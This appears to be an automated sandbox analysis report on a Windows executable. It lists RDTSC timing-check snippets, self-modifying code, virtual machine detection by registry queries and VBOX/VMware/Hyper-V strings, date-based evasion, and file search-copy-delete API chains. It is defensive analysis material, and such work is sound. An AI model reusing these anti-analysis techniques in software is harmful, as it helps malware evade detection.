Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203A8A second address: 1203A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94D2 second address: 12E94D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94D7 second address: 12E94E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F6778CEBE46h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E94E5 second address: 12E94EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12E9393 second address: 12E939D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBF48 second address: 12EBF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F67787C0186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12EBF54 second address: 12EBF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40CD second address: 12F40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40D1 second address: 12F40EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE50h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F40EA second address: 12F4109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0199h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F2C16 second address: 12F2C50 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE58h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6778CEBE56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F2F12 second address: 12F2F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3085 second address: 12F308B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F308B second address: 12F3097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3230 second address: 12F3236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F3236 second address: 12F323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F323D second address: 12F3243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F33A8 second address: 12F33B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F86E5 second address: 12F871D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6778CEBE59h 0x00000009 jmp 00007F6778CEBE56h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F8409 second address: 12F840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1309971 second address: 1309977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13097F0 second address: 13097F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCC8 second address: 132BCCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCCC second address: 132BCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132BCD0 second address: 132BCEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6778CEBE55h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C502 second address: 132C506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C506 second address: 132C50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C50A second address: 132C510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C510 second address: 132C522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132C522 second address: 132C542 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 jno 00007F67787C018Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F83F second address: 132F844 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F8FE second address: 132F904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F904 second address: 132F918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F6778CEBE46h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F918 second address: 132F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132F91C second address: 132F932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 132FBCA second address: 132FBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1330D36 second address: 1330D4A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F6778CEBE50h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334217 second address: 133421B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133421B second address: 1334251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6778CEBE51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F6778CEBE46h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F6778CEBE55h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334251 second address: 1334256 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1334256 second address: 1334263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007F6778CEBE4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0318 second address: 55F032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F03E6 second address: 55F0406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0406 second address: 55F040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F040C second address: 55F0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ah, F2h 0x0000000e pushfd 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 and ch, FFFFFF8Eh 0x00000017 jmp 00007F6778CEBE59h 0x0000001c popfd 0x0000001d popad 0x0000001e mov di, ax 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE59h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249E27 second address: 1249E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FDE second address: 1249FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FE2 second address: 1249FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FEC second address: 1249FFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F6778CEBE46h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1249FFE second address: 124A008 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 108FA62 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 123D515 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12697D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 124ED80 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 12CD573 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 4.7 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E518A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E53910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51269
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E51250
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5E210
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E5CBE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E523A9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,	1_2_00E52390
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E4DB99
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E54B29
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E54B10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_00E5DD30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_00E5D530
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_00E416A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_00E416B9

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E61BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,

1_2_00E61BF0

Source: file.exe, file.exe, 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1389080982.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001726000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
